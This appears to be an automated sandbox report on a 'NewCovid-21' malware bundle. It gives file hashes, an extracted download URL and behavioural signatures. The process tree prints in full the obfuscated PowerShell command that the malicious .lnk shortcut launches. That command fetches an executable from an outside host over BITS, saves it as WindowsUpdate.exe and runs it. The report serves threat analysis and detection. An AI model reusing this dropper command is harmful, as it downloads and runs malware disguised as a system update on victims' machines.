Overview
overview
10Static
static
3NewCovid-2...21.exe
windows7-x64
10NewCovid-2...21.exe
windows10-2004-x64
10NewCovid-2...ed.pdf
windows7-x64
1NewCovid-2...ed.pdf
windows10-2004-x64
1NewCovid-2...er.lnk
windows7-x64
10NewCovid-2...er.lnk
windows10-2004-x64
10NewCovid-2...ic.rtf
windows7-x64
8NewCovid-2...ic.rtf
windows10-2004-x64
1Analysis
-
max time kernel
141s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
10-04-2024 10:36
Static task
static1
Behavioral task
behavioral1
Sample
NewCovid-21/08042021.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
NewCovid-21/08042021.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
NewCovid-21/GEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
NewCovid-21/GEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
NewCovid-21/New Folder.lnk
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
NewCovid-21/New Folder.lnk
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
NewCovid-21/Statistic.rtf
Resource
win7-20231129-en
Behavioral task
behavioral8
Sample
NewCovid-21/Statistic.rtf
Resource
win10v2004-20240226-en
General
-
Target
NewCovid-21/New Folder.lnk
-
Size
1KB
-
MD5
aa3e4c243b101ed6c92b38fe8670a724
-
SHA1
b85ef90888d2169252af104e809726e92aa518ef
-
SHA256
172f12c692611e928e4ea42b883b90147888b54a8fb858fc97140b82eef409f3
-
SHA512
cecb656b59170bb1e67e50f38f2b2b4753b8b63ec0633604c40018ccbe45b25c69828e0d3909b8d946ac0d44e52a5a8604c0b0537a7baa9ed3e36c7df6d64d9a
Malware Config
Extracted
http://buking.site/soft/08042021.exe
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3380 powershell.exe 3380 powershell.exe 3380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3380 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2904 wrote to memory of 3236 2904 cmd.exe cmd.exe PID 2904 wrote to memory of 3236 2904 cmd.exe cmd.exe PID 3236 wrote to memory of 3380 3236 cmd.exe powershell.exe PID 3236 wrote to memory of 3380 3236 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\NewCovid-21\New Folder.lnk"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://buk'+'ing.si'+'te'+'/so'+'ft'+'/08'+'04'+'2021.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://buk'+'ing.si'+'te'+'/so'+'ft'+'/08'+'04'+'2021.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3380
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3712 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:81⤵PID:3012
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82